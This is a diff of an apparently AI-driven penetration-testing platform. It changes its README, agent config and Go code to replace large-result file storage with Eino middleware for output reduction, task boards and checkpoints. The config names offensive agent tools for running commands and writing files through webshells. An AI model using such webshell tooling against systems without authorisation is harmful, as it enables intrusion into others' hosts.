- **自定义提示词**:每个角色可定义 `user_prompt`,会在用户消息前自动添加,引导 AI 采用特定的测试方法和关注重点。 - **自定义提示词**:每个角色可定义 `user_prompt`,会在用户消息前自动添加,引导 AI 采用特定的测试方法和关注重点。
- **工具限制**:角色可指定 `tools` 列表,限制可用工具,实现聚焦的测试流程(如 CTF 角色限制为 CTF 专用工具)。 - **工具限制**:角色可指定 `tools` 列表,限制可用工具,实现聚焦的测试流程(如 CTF 角色限制为 CTF 专用工具)。
- **Skills**:技能包位于 `skills_dir`;启用 **`multi_agent.eino_skills`** 后,**单代理与多代理**均可通过 Eino **`skill`** 工具按需加载。中间件与本机 read_file/glob/grep 等见文档。 - **Skills**:技能包位于 `skills_dir`;启用 **`multi_agent.eino_skills`** 后,**单代理与多代理**均可通过 Eino **`skill`** 工具按需加载。可选 **`eino_middleware`**tool_search、plantask、reduction、checkpoint、Summarization 转录等)与本机 read_file/glob/grep 等见文档。
- **轻松创建角色**:通过在 `roles/` 目录添加 YAML 文件即可创建自定义角色。每个角色定义 `name`、`description`、`user_prompt`、`icon`、`tools`、`enabled` 字段。 - **轻松创建角色**:通过在 `roles/` 目录添加 YAML 文件即可创建自定义角色。每个角色定义 `name`、`description`、`user_prompt`、`icon`、`tools`、`enabled` 字段。
- **Web 界面集成**:在聊天界面通过下拉菜单选择角色。角色选择会影响 AI 行为和可用工具建议。 - **Web 界面集成**:在聊天界面通过下拉菜单选择角色。角色选择会影响 AI 行为和可用工具建议。
@@ -286,6 +292,7 @@ go build -o cyberstrike-ai cmd/server/main.go
- **子代理****deep** / **supervisor**):其余 `*.md`;标成 orchestrator 的不会进入 `task` 列表。 - **子代理****deep** / **supervisor**):其余 `*.md`;标成 orchestrator 的不会进入 `task` 列表。
- **界面管理****Agents → Agent 管理**API `/api/multi-agent/markdown-agents`。 - **界面管理****Agents → Agent 管理**API `/api/multi-agent/markdown-agents`。
- **配置项**`multi_agent``enabled`、`robot_default_agent_mode`、`batch_use_multi_agent`、`max_iteration`、`plan_execute_loop_max_iterations`、各模式 orchestrator 指令字段、可选 YAML `sub_agents` 与目录合并(同 `id` → Markdown 优先)、**`eino_skills`**、**`eino_middleware`**。 - **配置项**`multi_agent``enabled`、`robot_default_agent_mode`、`batch_use_multi_agent`、`max_iteration`、`plan_execute_loop_max_iterations`、各模式 orchestrator 指令字段、可选 YAML `sub_agents` 与目录合并(同 `id` → Markdown 优先)、**`eino_skills`**、**`eino_middleware`**。
- **长任务与恢复**`checkpoint_dir` 支持进程崩溃后 ADK **断点续跑**(与基于 trace 的「中断继续」不同)。`deep_model_retry_max_retries` 在同一次 LLM 调用内重试瞬时 API 失败。**Summarization** 触发压缩时会写入过滤后的 **transcript**,摘要消息中带路径,模型可用 `read_file` 找回扫描输出等压缩前细节。
- **更多细节**[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)(流式、机器人、批量、中间件差异)。 - **更多细节**[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)(流式、机器人、批量、中间件差异)。
### Skills 技能系统(Agent Skills + Eino ### Skills 技能系统(Agent Skills + Eino
@@ -293,7 +300,7 @@ go build -o cyberstrike-ai cmd/server/main.go
- **运行侧重构****`skills_dir`** 为技能包唯一根目录;**多代理** 通过 Eino 官方 **`skill`** 中间件做 **渐进式披露**(模型按 **name** 调用 `skill`,而非一次性注入全文)。由 **`multi_agent.eino_skills`** 控制:`disable`、`filesystem_tools`(本机读写与 Shell)、`skill_tool_name`。 - **运行侧重构****`skills_dir`** 为技能包唯一根目录;**多代理** 通过 Eino 官方 **`skill`** 中间件做 **渐进式披露**(模型按 **name** 调用 `skill`,而非一次性注入全文)。由 **`multi_agent.eino_skills`** 控制:`disable`、`filesystem_tools`(本机读写与 Shell)、`skill_tool_name`。
- **Eino / 知识流水线**:技能包可切分为 `schema.Document`,供 `FilesystemSkillsRetriever``skills.AsEinoRetriever()`)在 **compose** 图(如索引/编排)中使用。 - **Eino / 知识流水线**:技能包可切分为 `schema.Document`,供 `FilesystemSkillsRetriever``skills.AsEinoRetriever()`)在 **compose** 图(如索引/编排)中使用。
- **HTTP 管理**`/api/skills` 列表与 `depth=summary|full`、`section`、`resource_path` 等仍用于 Web 与运维;**模型侧** 多代理走 **`skill`** 工具,而非 MCP。 - **HTTP 管理**`/api/skills` 列表与 `depth=summary|full`、`section`、`resource_path` 等仍用于 Web 与运维;**模型侧** 多代理走 **`skill`** 工具,而非 MCP。
- **可选 `eino_middleware`**:如 `tool_search`(动态工具列表)、`patch_tool_calls`、`plantask`(结构化任务;默认落在 `skills_dir` 下子目录)、`reduction`、`checkpoint_dir`、Deep 输出键 / 模型重试 / task 描述前缀等,见 `config.yaml` 与 `internal/config/config.go`。 - **可选 `eino_middleware`**:如 `tool_search`(动态工具列表)、`patch_tool_calls`、**`plantask`**Eino `TaskCreate` / `TaskGet` / `TaskUpdate` / `TaskList`JSON 存于 `skills_dir/.eino/plantask/<会话ID>/`**全部**任务标为 completed 后 Eino 会清理任务文件)、`reduction`、**`checkpoint_dir`**(如 `data/eino-checkpoints/`)、**`deep_model_retry_max_retries`**、**`deep_output_key`**、task 描述前缀等,见 `config.yaml` 与 `internal/config/config.go`。
- **自带示例**`skills/cyberstrike-eino-demo/`;说明见 `skills/README.md`。 - **自带示例**`skills/cyberstrike-eino-demo/`;说明见 `skills/README.md`。
**新建技能:** **新建技能:**
@@ -303,7 +310,7 @@ go build -o cyberstrike-ai cmd/server/main.go
### 工具编排与扩展 ### 工具编排与扩展
- `tools/*.yaml` 定义命令、参数、提示词与元数据,可热加载。 - `tools/*.yaml` 定义命令、参数、提示词与元数据,可热加载。
- `security.tools_dir` 指向目录即可批量启用;仍支持在主配置里内联定义。 - `security.tools_dir` 指向目录即可批量启用;仍支持在主配置里内联定义。
- **大结果分页**:超过 200KB 的输出会保存为附件,可通过 `query_execution_result` 工具分页、过滤、正则检索 - **大工具输出**:超过 `reduction_max_length_for_trunc` 时由 Eino reduction 摘要,完整内容落盘至 `tmp/reduction/`;按 `<persisted-output>` 中的路径用 `read_file` 读取
- **结果压缩/摘要**:多兆字节日志可先压缩或生成摘要再写入 SQLite,减小档案体积。 - **结果压缩/摘要**:多兆字节日志可先压缩或生成摘要再写入 SQLite,减小档案体积。
**自定义工具的一般步骤** **自定义工具的一般步骤**
@@ -541,7 +548,7 @@ multi_agent:
orchestrator_instruction: "" # Deeporchestrator.md 正文为空时使用 orchestrator_instruction: "" # Deeporchestrator.md 正文为空时使用
# orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor 可选 # orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor 可选
# eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill } # eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill }
# eino_middleware: 可选 patch_tool_calls、tool_search、plantask、reduction、checkpoint_dir # eino_middleware: plantask_enable、checkpoint_dir、deep_model_retry_max_retries、deep_output_key
``` ```
### 工具模版示例(`tools/nmap.yaml` ### 工具模版示例(`tools/nmap.yaml`
-19
View File
@@ -5,7 +5,6 @@ import (
"cyberstrike-ai/internal/logger" "cyberstrike-ai/internal/logger"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/security" "cyberstrike-ai/internal/security"
"cyberstrike-ai/internal/storage"
"flag" "flag"
"fmt" "fmt"
"os" "os"
@@ -33,23 +32,6 @@ func main() {
// 创建安全工具执行器 // 创建安全工具执行器
executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger) executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger)
// 初始化结果存储(与 internal/app/app.go 同样的逻辑)。
// stdio 模式下原本不初始化,导致 'exec' 等查询型工具报"结果存储未初始化"。
resultStorageDir := "tmp"
if cfg.Agent.ResultStorageDir != "" {
resultStorageDir = cfg.Agent.ResultStorageDir
}
if err := os.MkdirAll(resultStorageDir, 0755); err != nil {
fmt.Fprintf(os.Stderr, "创建结果存储目录失败: %v\n", err)
os.Exit(1)
}
resultStorage, err := storage.NewFileResultStorage(resultStorageDir, log.Logger)
if err != nil {
fmt.Fprintf(os.Stderr, "初始化结果存储失败: %v\n", err)
os.Exit(1)
}
executor.SetResultStorage(resultStorage)
// 注册工具 // 注册工具
executor.RegisterTools(mcpServer) executor.RegisterTools(mcpServer)
@@ -61,4 +43,3 @@ func main() {
os.Exit(1) os.Exit(1)
} }
} }
+7 -9
View File
@@ -10,7 +10,7 @@
# ============================================ # ============================================
# 前端显示的版本号(可选,不填则显示默认版本) # 前端显示的版本号(可选,不填则显示默认版本)
version: "v1.6.32" version: "v1.6.39"
# 服务器配置 # 服务器配置
server: server:
host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口 host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口
@@ -92,8 +92,6 @@ fofa:
# 达到最大迭代次数时,AI 会自动总结测试结果 # 达到最大迭代次数时,AI 会自动总结测试结果
agent: agent:
max_iterations: 12000 # 全局最大迭代次数(单代理 / Deep / Supervisor / Plan-Execute 主执行器 / 子代理均沿用;agents/*.md 中 max_iterations>0 可单独覆盖) max_iterations: 12000 # 全局最大迭代次数(单代理 / Deep / Supervisor / Plan-Execute 主执行器 / 子代理均沿用;agents/*.md 中 max_iterations>0 可单独覆盖)
large_result_threshold: 102400 # 大结果阈值(字节),默认50KB,超过此大小会自动保存到存储
result_storage_dir: tmp # 结果存储目录,大结果会保存在此目录下
tool_timeout_minutes: 60 # 单次工具执行最大时长(分钟),超时自动终止;0 表示不限制(不推荐,易出现长时间挂起) tool_timeout_minutes: 60 # 单次工具执行最大时长(分钟),超时自动终止;0 表示不限制(不推荐,易出现长时间挂起)
# system_prompt_path: prompts/single-agent.md # 可选:单代理系统提示文件(相对本配置文件所在目录);非空且可读时替换内置提示 # system_prompt_path: prompts/single-agent.md # 可选:单代理系统提示文件(相对本配置文件所在目录);非空且可读时替换内置提示
@@ -129,8 +127,8 @@ multi_agent:
tool_search_min_tools: 20 # 达到该数量才启用 tool_search(避免工具很少时多此一举);与 always_visible 配合使用 tool_search_min_tools: 20 # 达到该数量才启用 tool_search(避免工具很少时多此一举);与 always_visible 配合使用
tool_search_always_visible: 12 # 始终直接暴露给模型的工具个数(顺序与角色工具列表一致);其余工具进入动态池,需 tool_search 解锁 tool_search_always_visible: 12 # 始终直接暴露给模型的工具个数(顺序与角色工具列表一致);其余工具进入动态池,需 tool_search 解锁
tool_search_always_visible_tools: [read_file, glob, grep, analyze_image, write_file, edit_file, execute, task, transfer_to_agent, exit, write_todos, skill, tool_search, TaskCreate, TaskGet, TaskUpdate, TaskList, record_vulnerability, list_vulnerabilities, get_vulnerability, list_knowledge_risk_types, search_knowledge_base, webshell_exec, webshell_file_list, webshell_file_read, webshell_file_write, manage_webshell_list, manage_webshell_add, manage_webshell_update, manage_webshell_delete, manage_webshell_test, batch_task_list, batch_task_get, batch_task_start, batch_task_rerun, batch_task_pause, batch_task_update_metadata, batch_task_update_schedule, batch_task_schedule_enabled, batch_task_update_task, batch_task_remove_task, batch_task_delete, batch_task_create, batch_task_add_task, http-framework-test] # 后端内置常驻工具白名单(优先于 always_visible 数量策略) tool_search_always_visible_tools: [read_file, glob, grep, analyze_image, write_file, edit_file, execute, task, transfer_to_agent, exit, write_todos, skill, tool_search, TaskCreate, TaskGet, TaskUpdate, TaskList, record_vulnerability, list_vulnerabilities, get_vulnerability, list_knowledge_risk_types, search_knowledge_base, webshell_exec, webshell_file_list, webshell_file_read, webshell_file_write, manage_webshell_list, manage_webshell_add, manage_webshell_update, manage_webshell_delete, manage_webshell_test, batch_task_list, batch_task_get, batch_task_start, batch_task_rerun, batch_task_pause, batch_task_update_metadata, batch_task_update_schedule, batch_task_schedule_enabled, batch_task_update_task, batch_task_remove_task, batch_task_delete, batch_task_create, batch_task_add_task, http-framework-test] # 后端内置常驻工具白名单(优先于 always_visible 数量策略)
plantask_enable: false # true:主代理(Deep / Supervisor 主)挂载 TaskCreate/Get/Update/List;需 eino_skills 可用且 skills_dir 存在,否则仅打日志并跳过 plantask_enable: true # P0:主代理挂载 TaskCreate/Get/Update/List 结构化任务板;需 eino_skills 可用且 skills_dir 存在
plantask_rel_dir: .eino/plantask # 结构化任务文件相对 skills_dir 的子目录,其下再按会话 ID 分子目录存放 plantask_rel_dir: .eino/plantask # 任务文件相对 skills_dir,按会话分子目录:skills/.eino/plantask/<conversationId>/
reduction_enable: true # true:大工具输出截断/落盘以控上下文;依赖与 plantask 相同的 eino local 写盘后端,无后端时不挂载 reduction_enable: true # true:大工具输出截断/落盘以控上下文;依赖与 plantask 相同的 eino local 写盘后端,无后端时不挂载
reduction_max_length_for_trunc: 50000 # 单条工具结果超过该字符数(bytes)时截断并落盘(由 reduction 中间件处理) reduction_max_length_for_trunc: 50000 # 单条工具结果超过该字符数(bytes)时截断并落盘(由 reduction 中间件处理)
reduction_max_tokens_for_clear: 160000 # 历史工具结果清理阈值(tokens),超阈值时在模型调用前清理旧结果 reduction_max_tokens_for_clear: 160000 # 历史工具结果清理阈值(tokens),超阈值时在模型调用前清理旧结果
@@ -143,11 +141,11 @@ multi_agent:
plan_execute_executed_steps_budget_ratio: 0.2 # plan_execute 中 executed_steps 预算比例 plan_execute_executed_steps_budget_ratio: 0.2 # plan_execute 中 executed_steps 预算比例
plan_execute_max_step_result_runes: 4000 # plan_execute 每步结果最大字符数(超出截断) plan_execute_max_step_result_runes: 4000 # plan_execute 每步结果最大字符数(超出截断)
plan_execute_keep_last_steps: 8 # plan_execute 仅保留最近 N 步正文,早期步骤折叠为标题 plan_execute_keep_last_steps: 8 # plan_execute 仅保留最近 N 步正文,早期步骤折叠为标题
checkpoint_dir: "" # 非空:为 adk.NewRunner 启用按会话子目录的文件型 CheckPointStore,便于中断恢复持久化;Resume 的 HTTP/前端流程需另行对接 checkpoint_dir: data/eino-checkpoints # P0:进程崩溃/OOM 后同会话自动 ADK Resume;正常结束会删 .ckpt;与「中断并继续」(last_react_*) 是两套机制
run_retry_max_attempts: 0 # >0429/5xx/网络抖动时 ADK 运行循环指数退避续跑次数0=默认 10 run_retry_max_attempts: 0 # 429/5xx/网络抖动时整轮 Run 指数退避续跑;0=默认 10(与 deep_model_retry 互补,建议保持默认)
run_retry_max_backoff_sec: 0 # 单次退避上限秒数;0=默认 30 run_retry_max_backoff_sec: 0 # 单次退避上限秒数;0=默认 30
deep_output_key: "" # 非空:将最终助手输出写入 adk session 的键名(DeepSupervisor 主代理);空表示不写入 deep_output_key: final_answer # P0Eino session 写入最终助手结论(框架内部;Deep/Supervisor 主/eino_single
deep_model_retry_max_retries: 0 # >0ChatModel 调用失败时框架级最大重试次数(Deep 与 Supervisor 主);0:不重试 deep_model_retry_max_retries: 3 # P0单次 ChatModel API 失败时框架自动重试(超时/502 等);子代理模型不受此项影响
task_tool_description_prefix: "" # 非空:仅 Deep 的 task 工具使用自定义描述前缀,运行时会拼接子代理名称;空则走 Eino 默认生成逻辑 task_tool_description_prefix: "" # 非空:仅 Deep 的 task 工具使用自定义描述前缀,运行时会拼接子代理名称;空则走 Eino 默认生成逻辑
# Eino callbacks + OpenTelemetry:框架级 span(与 Zap 对齐);默认不向终端用户 UI 推 eino_trace_*(见 sse_trace_to_client # Eino callbacks + OpenTelemetry:框架级 span(与 Zap 对齐);默认不向终端用户 UI 推 eino_trace_*(见 sse_trace_to_client
eino_callbacks: eino_callbacks:
Binary file not shown.

Before

Width:  |  Height:  |  Size: 726 KiB

After

Width:  |  Height:  |  Size: 941 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 262 KiB

After

Width:  |  Height:  |  Size: 179 KiB

+17 -135
View File
@@ -18,7 +18,6 @@ import (
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/mcp/builtin" "cyberstrike-ai/internal/mcp/builtin"
"cyberstrike-ai/internal/openai" "cyberstrike-ai/internal/openai"
"cyberstrike-ai/internal/storage"
"go.uber.org/zap" "go.uber.org/zap"
) )
@@ -32,8 +31,6 @@ type Agent struct {
externalMCPMgr *mcp.ExternalMCPManager // 外部MCP管理器 externalMCPMgr *mcp.ExternalMCPManager // 外部MCP管理器
logger *zap.Logger logger *zap.Logger
maxIterations int maxIterations int
resultStorage ResultStorage // 结果存储
largeResultThreshold int // 大结果阈值(字节)
mu sync.RWMutex // 添加互斥锁以支持并发更新 mu sync.RWMutex // 添加互斥锁以支持并发更新
toolNameMapping map[string]string // 工具名称映射:OpenAI格式 -> 原始格式(用于外部MCP工具) toolNameMapping map[string]string // 工具名称映射:OpenAI格式 -> 原始格式(用于外部MCP工具)
currentConversationID string // 当前对话ID(用于自动传递给工具) currentConversationID string // 当前对话ID(用于自动传递给工具)
@@ -41,18 +38,6 @@ type Agent struct {
toolDescriptionMode string // 工具描述模式: "short" | "full",默认 short toolDescriptionMode string // 工具描述模式: "short" | "full",默认 short
} }
// ResultStorage 结果存储接口(直接使用 storage 包的类型)
type ResultStorage interface {
SaveResult(executionID string, toolName string, result string) error
GetResult(executionID string) (string, error)
GetResultPage(executionID string, page int, limit int) (*storage.ResultPage, error)
SearchResult(executionID string, keyword string, useRegex bool) ([]string, error)
FilterResult(executionID string, filter string, useRegex bool) ([]string, error)
GetResultMetadata(executionID string) (*storage.ResultMetadata, error)
GetResultPath(executionID string) string
DeleteResult(executionID string) error
}
type agentConversationIDKey struct{} type agentConversationIDKey struct{}
func withAgentConversationID(ctx context.Context, id string) context.Context { func withAgentConversationID(ctx context.Context, id string) context.Context {
@@ -83,26 +68,6 @@ func NewAgent(cfg *config.OpenAIConfig, agentCfg *config.AgentConfig, mcpServer
maxIterations = 30 maxIterations = 30
} }
// 设置大结果阈值,默认50KB
largeResultThreshold := 50 * 1024
if agentCfg != nil && agentCfg.LargeResultThreshold > 0 {
largeResultThreshold = agentCfg.LargeResultThreshold
}
// 设置结果存储目录,默认tmp
resultStorageDir := "tmp"
if agentCfg != nil && agentCfg.ResultStorageDir != "" {
resultStorageDir = agentCfg.ResultStorageDir
}
// 初始化结果存储
var resultStorage ResultStorage
if resultStorageDir != "" {
// 导入storage包(避免循环依赖,使用接口)
// 这里需要在实际使用时初始化
// 暂时设为nil,在需要时初始化
}
// 配置HTTP Transport,优化连接管理和超时设置 // 配置HTTP Transport,优化连接管理和超时设置
transport := &http.Transport{ transport := &http.Transport{
DialContext: (&net.Dialer{ DialContext: (&net.Dialer{
@@ -133,20 +98,11 @@ func NewAgent(cfg *config.OpenAIConfig, agentCfg *config.AgentConfig, mcpServer
externalMCPMgr: externalMCPMgr, externalMCPMgr: externalMCPMgr,
logger: logger, logger: logger,
maxIterations: maxIterations, maxIterations: maxIterations,
resultStorage: resultStorage,
largeResultThreshold: largeResultThreshold,
toolNameMapping: make(map[string]string), // 初始化工具名称映射 toolNameMapping: make(map[string]string), // 初始化工具名称映射
toolDescriptionMode: "short", toolDescriptionMode: "short",
} }
} }
// SetResultStorage 设置结果存储(用于避免循环依赖)
func (a *Agent) SetResultStorage(storage ResultStorage) {
a.mu.Lock()
defer a.mu.Unlock()
a.resultStorage = storage
}
// SetPromptBaseDir 设置单代理 system_prompt_path 相对路径的基准目录(一般为 config.yaml 所在目录)。 // SetPromptBaseDir 设置单代理 system_prompt_path 相对路径的基准目录(一般为 config.yaml 所在目录)。
func (a *Agent) SetPromptBaseDir(dir string) { func (a *Agent) SetPromptBaseDir(dir string) {
a.mu.Lock() a.mu.Lock()
@@ -663,46 +619,6 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
} }
resultStr := resultText.String() resultStr := resultText.String()
resultSize := len(resultStr)
// 检测大结果并保存
a.mu.RLock()
threshold := a.largeResultThreshold
storage := a.resultStorage
a.mu.RUnlock()
if resultSize > threshold && storage != nil {
// 异步保存大结果
go func() {
if err := storage.SaveResult(executionID, toolName, resultStr); err != nil {
a.logger.Warn("保存大结果失败",
zap.String("executionID", executionID),
zap.String("toolName", toolName),
zap.Error(err),
)
} else {
a.logger.Info("大结果已保存",
zap.String("executionID", executionID),
zap.String("toolName", toolName),
zap.Int("size", resultSize),
)
}
}()
// 返回最小化通知
lines := strings.Split(resultStr, "\n")
filePath := ""
if storage != nil {
filePath = storage.GetResultPath(executionID)
}
notification := a.formatMinimalNotification(executionID, toolName, resultSize, len(lines), filePath)
return &ToolExecutionResult{
Result: notification,
ExecutionID: executionID,
IsError: result != nil && result.IsError,
}, nil
}
return &ToolExecutionResult{ return &ToolExecutionResult{
Result: resultStr, Result: resultStr,
@@ -711,57 +627,6 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
}, nil }, nil
} }
// formatMinimalNotification 格式化最小化通知
func (a *Agent) formatMinimalNotification(executionID string, toolName string, size int, lineCount int, filePath string) string {
var sb strings.Builder
sb.WriteString(fmt.Sprintf("工具执行完成。结果已保存(ID: %s)。\n\n", executionID))
sb.WriteString("结果信息:\n")
sb.WriteString(fmt.Sprintf(" - 工具: %s\n", toolName))
sb.WriteString(fmt.Sprintf(" - 大小: %d 字节 (%.2f KB)\n", size, float64(size)/1024))
sb.WriteString(fmt.Sprintf(" - 行数: %d 行\n", lineCount))
if filePath != "" {
sb.WriteString(fmt.Sprintf(" - 文件路径: %s\n", filePath))
}
sb.WriteString("\n")
sb.WriteString("推荐使用 query_execution_result 工具查询完整结果:\n")
sb.WriteString(fmt.Sprintf(" - 查询第一页: query_execution_result(execution_id=\"%s\", page=1, limit=100)\n", executionID))
sb.WriteString(fmt.Sprintf(" - 搜索关键词: query_execution_result(execution_id=\"%s\", search=\"关键词\")\n", executionID))
sb.WriteString(fmt.Sprintf(" - 过滤条件: query_execution_result(execution_id=\"%s\", filter=\"error\")\n", executionID))
sb.WriteString(fmt.Sprintf(" - 正则匹配: query_execution_result(execution_id=\"%s\", search=\"\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+\", use_regex=true)\n", executionID))
sb.WriteString("\n")
if filePath != "" {
sb.WriteString("如果 query_execution_result 工具不满足需求,也可以使用其他工具处理文件:\n")
sb.WriteString("\n")
sb.WriteString("**分段读取示例:**\n")
sb.WriteString(fmt.Sprintf(" - 查看前100行: exec(command=\"head\", args=[\"-n\", \"100\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 查看后100行: exec(command=\"tail\", args=[\"-n\", \"100\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 查看第50-150行: exec(command=\"sed\", args=[\"-n\", \"50,150p\", \"%s\"])\n", filePath))
sb.WriteString("\n")
sb.WriteString("**搜索和正则匹配示例:**\n")
sb.WriteString(fmt.Sprintf(" - 搜索关键词: exec(command=\"grep\", args=[\"关键词\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 正则匹配IP地址: exec(command=\"grep\", args=[\"-E\", \"\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 不区分大小写搜索: exec(command=\"grep\", args=[\"-i\", \"关键词\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 显示匹配行号: exec(command=\"grep\", args=[\"-n\", \"关键词\", \"%s\"])\n", filePath))
sb.WriteString("\n")
sb.WriteString("**过滤和统计示例:**\n")
sb.WriteString(fmt.Sprintf(" - 统计总行数: exec(command=\"wc\", args=[\"-l\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 过滤包含error的行: exec(command=\"grep\", args=[\"error\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 排除空行: exec(command=\"grep\", args=[\"-v\", \"^$\", \"%s\"])\n", filePath))
sb.WriteString("\n")
sb.WriteString("**完整读取(不推荐大文件):**\n")
sb.WriteString(fmt.Sprintf(" - 使用 cat 工具: cat(file=\"%s\")\n", filePath))
sb.WriteString(fmt.Sprintf(" - 使用 exec 工具: exec(command=\"cat\", args=[\"%s\"])\n", filePath))
sb.WriteString("\n")
sb.WriteString("**注意:**\n")
sb.WriteString(" - 直接读取大文件可能会再次触发大结果保存机制\n")
sb.WriteString(" - 建议优先使用分段读取和搜索功能,避免一次性加载整个文件\n")
sb.WriteString(" - 正则表达式语法遵循标准 POSIX 正则表达式规范\n")
}
return sb.String()
}
// UpdateConfig 更新OpenAI配置 // UpdateConfig 更新OpenAI配置
func (a *Agent) UpdateConfig(cfg *config.OpenAIConfig) { func (a *Agent) UpdateConfig(cfg *config.OpenAIConfig) {
a.mu.Lock() a.mu.Lock()
@@ -923,6 +788,23 @@ func (a *Agent) RecordLocalToolExecution(toolName string, args map[string]interf
return a.mcpServer.RecordCompletedToolInvocation(toolName, args, resultText, invokeErr) return a.mcpServer.RecordCompletedToolInvocation(toolName, args, resultText, invokeErr)
} }
// UpdateMCPExecutionDisplayResult 将监控库中的工具结果更新为送入模型的展示正文(reduction 后)。
func (a *Agent) UpdateMCPExecutionDisplayResult(executionID, resultText string) {
if a == nil || strings.TrimSpace(executionID) == "" {
return
}
text := resultText
if strings.TrimSpace(text) == "" {
text = "(无输出)"
}
tr := &mcp.ToolResult{
Content: []mcp.Content{{Type: "text", Text: text}},
}
if a.mcpServer != nil {
_ = a.mcpServer.UpdateToolExecutionResult(executionID, tr)
}
}
// CancelMCPToolExecutionWithNote 取消一次进行中的 MCP 工具(先内部后外部),与监控页「终止工具」一致;note 非空时合并进返回给模型的文本。 // CancelMCPToolExecutionWithNote 取消一次进行中的 MCP 工具(先内部后外部),与监控页「终止工具」一致;note 非空时合并进返回给模型的文本。
func (a *Agent) CancelMCPToolExecutionWithNote(executionID, note string) bool { func (a *Agent) CancelMCPToolExecutionWithNote(executionID, note string) bool {
executionID = strings.TrimSpace(executionID) executionID = strings.TrimSpace(executionID)
+4 -222
View File
@@ -1,21 +1,16 @@
package agent package agent
import ( import (
"os"
"path/filepath"
"strings"
"testing" "testing"
"time"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/storage"
"go.uber.org/zap" "go.uber.org/zap"
) )
// setupTestAgent 创建测试用的Agent // setupTestAgent 创建测试用的Agent
func setupTestAgent(t *testing.T) (*Agent, *storage.FileResultStorage) { func setupTestAgent(t *testing.T) *Agent {
logger := zap.NewNop() logger := zap.NewNop()
mcpServer := mcp.NewServer(logger) mcpServer := mcp.NewServer(logger)
@@ -26,205 +21,10 @@ func setupTestAgent(t *testing.T) (*Agent, *storage.FileResultStorage) {
} }
agentCfg := &config.AgentConfig{ agentCfg := &config.AgentConfig{
MaxIterations: 10, MaxIterations: 10,
LargeResultThreshold: 100, // 设置较小的阈值便于测试
ResultStorageDir: "",
} }
agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 10) return NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 10)
// 创建测试存储
tmpDir := filepath.Join(os.TempDir(), "test_agent_storage_"+time.Now().Format("20060102_150405"))
testStorage, err := storage.NewFileResultStorage(tmpDir, logger)
if err != nil {
t.Fatalf("创建测试存储失败: %v", err)
}
agent.SetResultStorage(testStorage)
return agent, testStorage
}
func TestAgent_FormatMinimalNotification(t *testing.T) {
agent, testStorage := setupTestAgent(t)
_ = testStorage // 避免未使用变量警告
executionID := "test_exec_001"
toolName := "nmap_scan"
size := 50000
lineCount := 1000
filePath := "tmp/test_exec_001.txt"
notification := agent.formatMinimalNotification(executionID, toolName, size, lineCount, filePath)
// 验证通知包含必要信息
if !strings.Contains(notification, executionID) {
t.Errorf("通知中应该包含执行ID: %s", executionID)
}
if !strings.Contains(notification, toolName) {
t.Errorf("通知中应该包含工具名称: %s", toolName)
}
if !strings.Contains(notification, "50000") {
t.Errorf("通知中应该包含大小信息")
}
if !strings.Contains(notification, "1000") {
t.Errorf("通知中应该包含行数信息")
}
if !strings.Contains(notification, "query_execution_result") {
t.Errorf("通知中应该包含查询工具的使用说明")
}
}
func TestAgent_ExecuteToolViaMCP_LargeResult(t *testing.T) {
agent, _ := setupTestAgent(t)
// 创建模拟的MCP工具结果(大结果)
largeResult := &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: strings.Repeat("This is a test line with some content.\n", 1000), // 约50KB
},
},
IsError: false,
}
// 模拟MCP服务器返回大结果
// 由于我们需要模拟CallTool的行为,这里需要创建一个mock或者使用实际的MCP服务器
// 为了简化测试,我们直接测试结果处理逻辑
// 设置阈值
agent.mu.Lock()
agent.largeResultThreshold = 1000 // 设置较小的阈值
agent.mu.Unlock()
// 创建执行ID
executionID := "test_exec_large_001"
toolName := "test_tool"
// 格式化结果
var resultText strings.Builder
for _, content := range largeResult.Content {
resultText.WriteString(content.Text)
resultText.WriteString("\n")
}
resultStr := resultText.String()
resultSize := len(resultStr)
// 检测大结果并保存
agent.mu.RLock()
threshold := agent.largeResultThreshold
storage := agent.resultStorage
agent.mu.RUnlock()
if resultSize > threshold && storage != nil {
// 保存大结果
err := storage.SaveResult(executionID, toolName, resultStr)
if err != nil {
t.Fatalf("保存大结果失败: %v", err)
}
// 生成通知
lines := strings.Split(resultStr, "\n")
filePath := storage.GetResultPath(executionID)
notification := agent.formatMinimalNotification(executionID, toolName, resultSize, len(lines), filePath)
// 验证通知格式
if !strings.Contains(notification, executionID) {
t.Errorf("通知中应该包含执行ID")
}
// 验证结果已保存
savedResult, err := storage.GetResult(executionID)
if err != nil {
t.Fatalf("获取保存的结果失败: %v", err)
}
if savedResult != resultStr {
t.Errorf("保存的结果与原始结果不匹配")
}
} else {
t.Fatal("大结果应该被检测到并保存")
}
}
